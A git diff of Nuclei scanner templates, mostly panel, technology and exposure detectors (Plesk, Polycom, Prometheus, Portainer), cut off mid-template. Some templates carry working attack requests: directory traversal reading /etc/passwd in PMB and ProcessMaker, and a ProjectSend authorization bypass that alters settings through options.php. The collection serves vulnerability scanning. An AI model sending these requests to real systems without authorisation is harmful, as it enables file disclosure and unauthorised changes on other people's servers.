dhiyaneshDk - severity: high - reference: https://github.com/pinpoint-apm/pinpoint - tags: pippoint,unauth - -requests: - - method: GET - path: - - '{{BaseURL}}/applications.pinpoint' - - matchers-condition: and - matchers: - - type: word - words: - - "applicationName" - - "serviceType" - condition: and - part: body - - - type: word - words: - - "application/json" - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/pinpoint-unauth-9590.yaml b/nuclei-templates/Other/pinpoint-unauth-9590.yaml new file mode 100644 index 0000000000..a776b01537 --- /dev/null +++ b/nuclei-templates/Other/pinpoint-unauth-9590.yaml @@ -0,0 +1,26 @@ +id: pinpoint-unauth +info: + name: PinPoint Unauth + author: dhiyaneshDk + severity: high + reference: https://github.com/pinpoint-apm/pinpoint + tags: pippoint,unauth +requests: + - method: GET + path: + - '{{BaseURL}}/applications.pinpoint' + matchers-condition: and + matchers: + - type: word + words: + - "applicationName" + - "serviceType" + condition: and + part: body + - type: word + words: + - "application/json" + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/plesk-obsidian-9596.yaml b/nuclei-templates/Other/plesk-obsidian-9596.yaml new file mode 100644 index 0000000000..9fdeccf21f --- /dev/null +++ b/nuclei-templates/Other/plesk-obsidian-9596.yaml @@ -0,0 +1,24 @@ +id: plesk-obsidian +info: + name: Plesk Obsidian + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6951 + tags: panel,plesk +requests: + - method: GET + path: + - '{{BaseURL}}/login_up.php' + matchers-condition: and + matchers: + - type: word + words: + - 'Plesk Obsidian' + - type: status + status: + - 200 + extractors: + - type: regex + group: 1 + regex: + - '(?i)([A-Za-z 0-9.]+)' diff --git a/nuclei-templates/Other/plesk-obsidian.yaml b/nuclei-templates/Other/plesk-obsidian.yaml deleted file mode 100644 index ee15fd8a20..0000000000 --- a/nuclei-templates/Other/plesk-obsidian.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: plesk-obsidian -info: - name: Plesk Obsidian - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6951 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/login_up.php' - matchers-condition: and - matchers: - - type: word - words: - - 'Plesk Obsidian' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/plesk-onyx-login.yaml b/nuclei-templates/Other/plesk-onyx-login.yaml new file mode 100644 index 0000000000..98a244e53c --- /dev/null +++ b/nuclei-templates/Other/plesk-onyx-login.yaml @@ -0,0 +1,23 @@ +id: plesk-onyx-login + +info: + name: Plesk Onyx login portal + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6501 + tags: panel,plesk,login + +requests: + - method: GET + path: + - '{{BaseURL}}/login_up.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Plesk Onyx' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/plesk-onyx.yaml b/nuclei-templates/Other/plesk-onyx.yaml deleted file mode 100644 index ce27005046..0000000000 --- a/nuclei-templates/Other/plesk-onyx.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: plesk-onyx-login -info: - name: Plesk Onyx login portal - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6501 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/login_up.php' - matchers-condition: and - matchers: - - type: word - words: - - 'Plesk Onyx' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/plone-cms-detect-9608.yaml b/nuclei-templates/Other/plone-cms-detect-9608.yaml new file mode 100644 index 0000000000..729051fa16 --- /dev/null +++ b/nuclei-templates/Other/plone-cms-detect-9608.yaml @@ -0,0 +1,23 @@ +id: plone-cms-detect +info: + name: Plone CMS detect + author: cyllective + severity: info + description: Detects Plone CMS + reference: + - https://github.com/plone/Products.CMFPlone + tags: tech,plone,cms +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + part: body + condition: or + words: + - 'Powered by Plone & Python    ' diff --git a/nuclei-templates/Other/plone-cms-detect.yaml b/nuclei-templates/Other/plone-cms-detect.yaml deleted file mode 100644 index 08791ef3f5..0000000000 --- a/nuclei-templates/Other/plone-cms-detect.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: plone-cms-detect - -info: - name: Plone CMS detect - author: cyllective - severity: info - description: Detects Plone CMS - tags: tech,plone,cms - reference: - - https://github.com/plone/Products.CMFPlone - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - part: body - condition: or - words: - - 'Powered by Plone & Python' \ No newline at end of file diff --git a/nuclei-templates/Other/pmb-directory-traversal-9611.yaml b/nuclei-templates/Other/pmb-directory-traversal-9611.yaml deleted file mode 100644 index 82917a647d..0000000000 --- a/nuclei-templates/Other/pmb-directory-traversal-9611.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: pmb-directory-traversal -info: - name: PMB 5.6 Directory Traversal - author: geeknik - severity: medium - description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, this can in turn be used to a Local File Disclosure. - reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html - tags: lfi -requests: - - method: GET - path: - - "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" - - "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/pmb-directory-traversal-9613.yaml b/nuclei-templates/Other/pmb-directory-traversal-9613.yaml new file mode 100644 index 0000000000..8c9f04c593 --- /dev/null +++ b/nuclei-templates/Other/pmb-directory-traversal-9613.yaml @@ -0,0 +1,23 @@ +id: pmb-directory-traversal +info: + name: PMB 5.6 - Arbitrary File Retrieval + author: geeknik + severity: medium + description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, wchi can be used for local file retrieval. + reference: + - https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html + tags: lfi +requests: + - method: GET + path: + - "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" + - "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/pmb-local-file-disclosure-9620.yaml b/nuclei-templates/Other/pmb-local-file-disclosure-9620.yaml index 0dafcc1e40..03a7d8928a 100644 --- a/nuclei-templates/Other/pmb-local-file-disclosure-9620.yaml +++ b/nuclei-templates/Other/pmb-local-file-disclosure-9620.yaml @@ -1,10 +1,15 @@ id: pmb-local-file-disclosure info: - name: PMB 5.6 - getgif.php Arbitrary File Retrieval + name: PMB 5.6 - Local File Inclusion author: dhiyaneshDk + description: PMB 5.6 is vulnerable to local file inclusion. severity: high reference: - https://www.exploit-db.com/exploits/49054 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: lfi,pmb requests: - method: GET @@ -18,3 +23,5 @@ requests: - type: word words: - "root:x:0" + +# Enhanced by mp on 2022/08/04 diff --git a/nuclei-templates/Other/polycom-login-9627.yaml b/nuclei-templates/Other/polycom-login-9627.yaml new file mode 100644 index 0000000000..279b09714f --- /dev/null +++ b/nuclei-templates/Other/polycom-login-9627.yaml @@ -0,0 +1,24 @@ +id: polycom-login + +info: + name: Polycom Login + author: DhiyaneshDk + severity: info + reference: https://www.exploit-db.com/ghdb/6863 + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login.html" + + matchers-condition: and + matchers: + - type: word + words: + - "Polycom Login" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/polycom-login.yaml b/nuclei-templates/Other/polycom-login.yaml deleted file mode 100644 index 29489ef1a1..0000000000 --- a/nuclei-templates/Other/polycom-login.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: polycom-login -info: - name: Polycom Login - author: DhiyaneshDk - severity: info - reference: https://www.exploit-db.com/ghdb/6863 - tags: panel -requests: - - method: GET - path: - - "{{BaseURL}}/login.html" - matchers-condition: and - matchers: - - type: word - words: - - "Polycom Login" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/portainer-init-deploy-9631.yaml b/nuclei-templates/Other/portainer-init-deploy-9631.yaml deleted file mode 100644 index 61deee3c3d..0000000000 --- a/nuclei-templates/Other/portainer-init-deploy-9631.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: portainer-init-deploy -info: - name: Portainer Init Deploy - author: princechaddha - severity: high - tags: portainer,exposure,docker,devops - reference: https://documentation.portainer.io/v2.0/deploy/initial/ -requests: - - method: GET - path: - - "{{BaseURL}}/api/users/admin/check" - matchers-condition: and - matchers: - - type: word - words: - - "No administrator account found inside the database" - - type: word - words: - - "application/json" - part: header - - type: status - status: - - 404 diff --git a/nuclei-templates/Other/portainer-init-deploy-9633.yaml b/nuclei-templates/Other/portainer-init-deploy-9633.yaml new file mode 100644 index 0000000000..db1f4fd4b3 --- /dev/null +++ b/nuclei-templates/Other/portainer-init-deploy-9633.yaml @@ -0,0 +1,24 @@ +id: portainer-init-deploy +info: + name: Portainer Init Deploy + author: princechaddha + severity: high + reference: + - https://documentation.portainer.io/v2.0/deploy/initial/ + tags: portainer,exposure,docker,devops,panel +requests: + - method: GET + path: + - "{{BaseURL}}/api/users/admin/check" + matchers-condition: and + matchers: + - type: word + words: + - "No administrator account found inside the database" + - type: word + words: + - "application/json" + part: header + - type: status + status: + - 404 diff --git a/nuclei-templates/Other/postmessage-outgoing-tracker.yaml b/nuclei-templates/Other/postmessage-outgoing-tracker-9636.yaml similarity index 100% rename from nuclei-templates/Other/postmessage-outgoing-tracker.yaml rename to nuclei-templates/Other/postmessage-outgoing-tracker-9636.yaml diff --git a/nuclei-templates/Other/postmessage-tracker-9640.yaml b/nuclei-templates/Other/postmessage-tracker-9640.yaml new file mode 100644 index 0000000000..d0a1e79480 --- /dev/null +++ b/nuclei-templates/Other/postmessage-tracker-9640.yaml @@ -0,0 +1,66 @@ +id: postmessage-tracker + +info: + name: Postmessage Tracker + author: pdteam + severity: info + reference: + - https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js + tags: headless,postmessage + +headless: + - steps: + - action: setheader + args: + part: response + key: Content-Security-Policy + value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;" + - action: script + args: + hook: true + code: | + (function() {window.alerts = []; + + function logger(found) { + window.alerts.push(found); + } + + function getStackTrace () { + var stack; + try { + throw new Error(''); + } + catch (error) { + stack = error.stack || ''; + } + stack = stack.split('\n').map(function (line) { return line.trim(); }); + return stack.splice(stack[0] == 'Error' ? 2 : 1); + } + + var oldListener = Window.prototype.addEventListener; + + Window.prototype.addEventListener = function(type, listener, useCapture) { + if(type === 'message') { + logger(getStackTrace()); + } + return oldListener.apply(this, arguments); + }; + })(); + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: alerts + args: + code: "window.alerts" + matchers: + - type: word + part: alerts + words: + - "at Window.addEventListener" + extractors: + - type: kval + part: alerts + kval: + - alerts diff --git a/nuclei-templates/Other/postmessage-tracker.yaml b/nuclei-templates/Other/postmessage-tracker.yaml deleted file mode 100644 index a091ac8494..0000000000 --- a/nuclei-templates/Other/postmessage-tracker.yaml +++ /dev/null @@ -1,65 +0,0 @@ -id: postmessage-tracker - -info: - name: Postmessage Tracker - author: pdteam - severity: info - reference: https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js - tags: headless,postmessage - -headless: - - steps: - - action: setheader - args: - part: response - key: Content-Security-Policy - value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;" - - action: script - args: - hook: true - code: | - (function() {window.alerts = []; - - function logger(found) { - window.alerts.push(found); - } - - function getStackTrace () { - var stack; - try { - throw new Error(''); - } - catch (error) { - stack = error.stack || ''; - } - stack = stack.split('\n').map(function (line) { return line.trim(); }); - return stack.splice(stack[0] == 'Error' ? 2 : 1); - } - - var oldListener = Window.prototype.addEventListener; - - Window.prototype.addEventListener = function(type, listener, useCapture) { - if(type === 'message') { - logger(getStackTrace()); - } - return oldListener.apply(this, arguments); - }; - })(); - - args: - url: "{{BaseURL}}" - action: navigate - - action: waitload - - action: script - name: alerts - args: - code: "window.alerts" - matchers: - - type: word - part: alerts - words: - - "at Window.addEventListener" - extractors: - - type: kval - part: alerts - kval: - - alerts diff --git a/nuclei-templates/Other/powercreator-cms-rce-9644.yaml b/nuclei-templates/Other/powercreator-cms-rce-9645.yaml similarity index 100% rename from nuclei-templates/Other/powercreator-cms-rce-9644.yaml rename to nuclei-templates/Other/powercreator-cms-rce-9645.yaml diff --git a/nuclei-templates/Other/powerlogic-ion-9650.yaml b/nuclei-templates/Other/powerlogic-ion-9650.yaml new file mode 100644 index 0000000000..4f5ae8d7fd --- /dev/null +++ b/nuclei-templates/Other/powerlogic-ion-9650.yaml @@ -0,0 +1,22 @@ +id: powerlogic-ion + +info: + name: PowerLogic ION Exposed + author: dhiyaneshDK + severity: low + reference: https://www.exploit-db.com/ghdb/6810 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'PowerLogic ION' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/powerlogic-ion.yaml b/nuclei-templates/Other/powerlogic-ion.yaml deleted file mode 100644 index a2dc55dd44..0000000000 --- a/nuclei-templates/Other/powerlogic-ion.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: powerlogic-ion -info: - name: PowerLogic ION Exposed - author: dhiyaneshDK - severity: low - reference: - - https://www.exploit-db.com/ghdb/6810 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - words: - - 'PowerLogic ION' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/prestashop-detect-9651.yaml b/nuclei-templates/Other/prestashop-detect-9651.yaml deleted file mode 100644 index bf158c78e6..0000000000 --- a/nuclei-templates/Other/prestashop-detect-9651.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: prestashop-detect - -info: - name: PrestaShop Tech Detection - author: pdteam - severity: info - tags: tech,cms,prestashop - metadata: - shodan-query: http.component:"PrestaShop" - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: regex - part: body - regex: - - Powered by ]+>PrestaShop - - - - - condition: or \ No newline at end of file diff --git a/nuclei-templates/Other/prestashop-detect.yaml b/nuclei-templates/Other/prestashop-detect.yaml new file mode 100644 index 0000000000..d18e4f89a4 --- /dev/null +++ b/nuclei-templates/Other/prestashop-detect.yaml @@ -0,0 +1,22 @@ +id: prestashop-detect +info: + name: PrestaShop Tech Detection + author: pdteam + severity: info + tags: tech,cms,prestashop + metadata: + shodan-query: http.component:"PrestaShop" +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 2 + matchers: + - type: regex + part: body + regex: + - Powered by ]+>PrestaShop + - + - + condition: or diff --git a/nuclei-templates/Other/printers-info-leak.yaml b/nuclei-templates/Other/printers-info-leak-9652.yaml similarity index 100% rename from nuclei-templates/Other/printers-info-leak.yaml rename to nuclei-templates/Other/printers-info-leak-9652.yaml diff --git a/nuclei-templates/Other/private-key-9656.yaml b/nuclei-templates/Other/private-key-9655.yaml similarity index 100% rename from nuclei-templates/Other/private-key-9656.yaml rename to nuclei-templates/Other/private-key-9655.yaml diff --git a/nuclei-templates/Other/processmaker-lfi-9660.yaml b/nuclei-templates/Other/processmaker-lfi-9660.yaml deleted file mode 100644 index 8b0804902a..0000000000 --- a/nuclei-templates/Other/processmaker-lfi-9660.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: processmaker-lfi -info: - name: ProcessMaker <= 3.5.4 Directory Traversal - author: KrE80r - severity: high - description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content. - reference: - - https://www.exploit-db.com/exploits/50229 - - https://www.processmaker.com - tags: processmaker,lfi -requests: - - raw: - - | - GET /../../../..//etc/passwd HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/processmaker-lfi.yaml b/nuclei-templates/Other/processmaker-lfi.yaml new file mode 100644 index 0000000000..744b09bbf9 --- /dev/null +++ b/nuclei-templates/Other/processmaker-lfi.yaml @@ -0,0 +1,23 @@ +id: processmaker-lfi +info: + name: ProcessMaker <= 3.5.4 Directory Traversal + author: KrE80r + severity: high + description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content. + reference: + - https://www.exploit-db.com/exploits/50229 + - https://www.processmaker.com + tags: processmaker,lfi +requests: + - raw: + - | + GET /../../../..//etc/passwd HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/production-logs-9664.yaml b/nuclei-templates/Other/production-logs-9664.yaml deleted file mode 100644 index a4f233a290..0000000000 --- a/nuclei-templates/Other/production-logs-9664.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: production-logs -info: - name: Discover production log files - author: geeknik - severity: info -requests: - - method: GET - path: - - "{{BaseURL}}/log/production.log" - - "{{BaseURL}}/logs/production.log" - - "{{BaseURL}}/production.log" - matchers-condition: and - matchers: - - type: word - words: - - "Connecting to database specified by database.yml" - - "Started GET" - condition: and - - type: word - part: header - words: - - "text/html" - negative: true - - type: status - status: - - 200 - extractors: - - type: regex - name: last_modified - part: header - regex: - - 'Last-Modified:.*' diff --git a/nuclei-templates/Other/production-logs-9665.yaml b/nuclei-templates/Other/production-logs-9665.yaml new file mode 100644 index 0000000000..3c90842c02 --- /dev/null +++ b/nuclei-templates/Other/production-logs-9665.yaml @@ -0,0 +1,33 @@ +id: production-logs +info: + name: Discover production log files + author: geeknik + severity: info + tags: exposure,logs,rails +requests: + - method: GET + path: + - "{{BaseURL}}/log/production.log" + - "{{BaseURL}}/logs/production.log" + - "{{BaseURL}}/production.log" + matchers-condition: and + matchers: + - type: word + words: + - "Connecting to database specified by database.yml" + - "Started GET" + condition: and + - type: status + status: + - 200 + - type: word + part: header + words: + - "text/html" + negative: true + extractors: + - type: regex + name: last_modified + part: header + regex: + - 'Last-Modified:.*' diff --git a/nuclei-templates/Other/project-insight-login-9670.yaml b/nuclei-templates/Other/project-insight-login.yaml similarity index 100% rename from nuclei-templates/Other/project-insight-login-9670.yaml rename to nuclei-templates/Other/project-insight-login.yaml diff --git a/nuclei-templates/Other/projectsend-auth-bypass.yaml b/nuclei-templates/Other/projectsend-auth-bypass.yaml new file mode 100644 index 0000000000..3508cceeed --- /dev/null +++ b/nuclei-templates/Other/projectsend-auth-bypass.yaml @@ -0,0 +1,64 @@ +id: projectsend-auth-bypass + +info: + name: ProjectSend <= r1605 - Improper Authorization + author: DhiyaneshDK + severity: high + description: | + An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application. + reference: + - https://www.projectsend.org/ + - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf + metadata: + verified: true + max-request: 1 + fofa-query: body="ProjectSend" + shodan-query: html:"ProjectSend" + tags: misconfig,projectsend,auth-bypass + +variables: + string: "{{randstr}}" + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "projectsend")' + condition: and + internal: true + + extractors: + - type: regex + name: csrf + group: 1 + regex: + - 'name="csrf_token" value="([0-9a-z]+)"' + internal: true + + - raw: + - | + POST /options.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrf_token={{csrf}}§ion=general&this_install_title={{string}} + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "{{string}}")' + condition: and +# digest: 4b0a00483046022100cbdf7867367646663d0f95096da7ed83173ecc5ad6edfbbb81fffd3afe8efcfa0221009cbb5bae0b46406c68174051fdff85191ee72553de70ffbb7e575a1b6c4b4aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/prometheus-exporter-9677.yaml b/nuclei-templates/Other/prometheus-exporter-9677.yaml deleted file mode 100644 index 51ba098670..0000000000 --- a/nuclei-templates/Other/prometheus-exporter-9677.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: prometheus-exporter -info: - name: Prometheus exporter detect - author: jarijaas - severity: info - description: Prometheus exporter detector - reference: - - https://github.com/prometheus/prometheus/wiki/Default-port-allocations - tags: prometheus -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - 'Exporter' - - 'Metrics' - condition: and - extractors: - - type: regex - part: body - group: 1 - regex: - - "(.*?)" diff --git a/nuclei-templates/Other/prometheus-exporter-9678.yaml b/nuclei-templates/Other/prometheus-exporter-9678.yaml new file mode 100644 index 0000000000..581f168104 --- /dev/null +++ b/nuclei-templates/Other/prometheus-exporter-9678.yaml @@ -0,0 +1,29 @@ +id: prometheus-exporter + +info: + name: Prometheus exporter detect + author: jarijaas + severity: info + description: Prometheus exporter detector + tags: prometheus + reference: https://github.com/prometheus/prometheus/wiki/Default-port-allocations + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Exporter' + - 'Metrics' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - "(.*?)" \ No newline at end of file diff --git a/nuclei-templates/Other/prometheus-exporter-detect-9676.yaml b/nuclei-templates/Other/prometheus-exporter-detect-9676.yaml index e5aa60f5b8..e0f4bf47fe 100644 --- a/nuclei-templates/Other/prometheus-exporter-detect-9676.yaml +++ b/nuclei-templates/Other/prometheus-exporter-detect-9676.yaml @@ -4,15 +4,13 @@ info: author: jarijaas severity: info description: Prometheus exporter detector - -# See https://github.com/prometheus/prometheus/wiki/Default-port-allocations - + tags: panel + reference: https://github.com/prometheus/prometheus/wiki/Default-port-allocations requests: - method: GET path: - - "{{BaseURL}}/" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: @@ -25,4 +23,4 @@ requests: name: exporter_name group: 1 regex: - - "(.*?)" \ No newline at end of file + - "(.*?)" diff --git a/nuclei-templates/Other/prometheus-exposed-panel-9682.yaml b/nuclei-templates/Other/prometheus-exposed-panel-9682.yaml deleted file mode 100644 index 2cda5cc379..0000000000 --- a/nuclei-templates/Other/prometheus-exposed-panel-9682.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: prometheus-exposed-panel - -info: - name: Prometheus.io exposed panel - author: organiccrap - severity: low - tags: panel,prometheus - -requests: - - method: GET - path: - - '{{BaseURL}}/graph' - - matchers: - - type: word - words: - - 'Prometheus Time Series Collection and Processing Server' \ No newline at end of file diff --git a/nuclei-templates/Other/prometheus-exposed-panel.yaml b/nuclei-templates/Other/prometheus-exposed-panel.yaml new file mode 100644 index 0000000000..371360dff8 --- /dev/null +++ b/nuclei-templates/Other/prometheus-exposed-panel.yaml @@ -0,0 +1,16 @@ +id: prometheus-exposed-panel +info: + name: Prometheus.io exposed panel + author: organiccrap + severity: low + # usually runs on port http/9090 +requests: + - method: GET + path: + - '{{BaseURL}}/graph' + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: + - type: word + words: + - Prometheus Time Series Collection and Processing Server diff --git a/nuclei-templates/Other/prometheus-flags-9687.yaml b/nuclei-templates/Other/prometheus-flags-9687.yaml deleted file mode 100644 index c0b22379c8..0000000000 --- a/nuclei-templates/Other/prometheus-flags-9687.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: prometheus-flags - -info: - name: Prometheus flags API endpoint - author: geeknik - severity: info - description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. - reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus,leak - -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/status/flags" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"data":' - - '"config.file":' - condition: and - - - type: word - part: header - words: - - 'application/json' - - extractors: - - type: regex - name: web_admin_enabled - regex: - - '\"web\.enable\-admin\-api\"\: \"true\"' diff --git a/nuclei-templates/Other/prometheus-flags-endpoint-9685.yaml b/nuclei-templates/Other/prometheus-flags-endpoint-9685.yaml deleted file mode 100644 index 0cefa431fc..0000000000 --- a/nuclei-templates/Other/prometheus-flags-endpoint-9685.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: prometheus-flags-endpoint - -info: - name: Prometheus flags API endpoint - author: geeknik - severity: info - description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. - reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/status/flags" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"data":' - - '"config.file":' - condition: and - - - type: word - part: header - words: - - 'application/json' - - extractors: - - type: regex - name: web_admin_enabled - regex: - - '\"web\.enable\-admin\-api\"\: \"true\"' diff --git a/nuclei-templates/Other/prometheus-flags-endpoint.yaml b/nuclei-templates/Other/prometheus-flags-endpoint.yaml new file mode 100644 index 0000000000..fa6b0ff5bb --- /dev/null +++ b/nuclei-templates/Other/prometheus-flags-endpoint.yaml @@ -0,0 +1,31 @@ +id: prometheus-flags-endpoint +info: + name: Prometheus flags API endpoint + author: geeknik + severity: info + description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + tags: prometheus,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/status/flags" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '"data":' + - '"config.file":' + condition: and + - type: word + part: header + words: + - 'application/json' + extractors: + - type: regex + name: web_admin_enabled + regex: + - '\"web\.enable\-admin\-api\"\: \"true\"' diff --git a/nuclei-templates/Other/prometheus-flags.yaml b/nuclei-templates/Other/prometheus-flags.yaml new file mode 100644 index 0000000000..ad5a884ecf --- /dev/null +++ b/nuclei-templates/Other/prometheus-flags.yaml @@ -0,0 +1,31 @@ +id: prometheus-flags +info: + name: Prometheus flags API endpoint + author: geeknik + severity: info + description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + tags: prometheus,leak +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/status/flags" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '"data":' + - '"config.file":' + condition: and + - type: word + part: header + words: + - 'application/json' + extractors: + - type: regex + name: web_admin_enabled + regex: + - '\"web\.enable\-admin\-api\"\: \"true\"' diff --git a/nuclei-templates/Other/prometheus-targets-9691.yaml b/nuclei-templates/Other/prometheus-targets-9691.yaml deleted file mode 100644 index 5e9ebbcca3..0000000000 --- a/nuclei-templates/Other/prometheus-targets-9691.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: prometheus-targets - -info: - name: Prometheus targets API endpoint - author: geeknik - severity: info - description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge. - reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus - -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/targets" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"status": "success"' - - '"data":' - - '"labels":' - condition: and - - - type: word - part: header - words: - - 'application/json' diff --git a/nuclei-templates/Other/prometheus-targets-9692.yaml b/nuclei-templates/Other/prometheus-targets-9692.yaml new file mode 100644 index 0000000000..0f9a6ff34b --- /dev/null +++ b/nuclei-templates/Other/prometheus-targets-9692.yaml @@ -0,0 +1,28 @@ +id: prometheus-targets +info: + name: Prometheus targets API endpoint + author: geeknik + severity: info + description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer's knowledge. + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + tags: prometheus +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/targets" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '"status": "success"' + - '"data":' + - '"labels":' + condition: and + - type: word + part: header + words: + - 'application/json' diff --git a/nuclei-templates/Other/proposify-takeover-9694.yaml b/nuclei-templates/Other/proposify-takeover-9694.yaml new file mode 100644 index 0000000000..2312d7cb42 --- /dev/null +++ b/nuclei-templates/Other/proposify-takeover-9694.yaml @@ -0,0 +1,15 @@ +id: proposify-takeover +info: + name: proposify takeover detection + author: pdcommunity + severity: 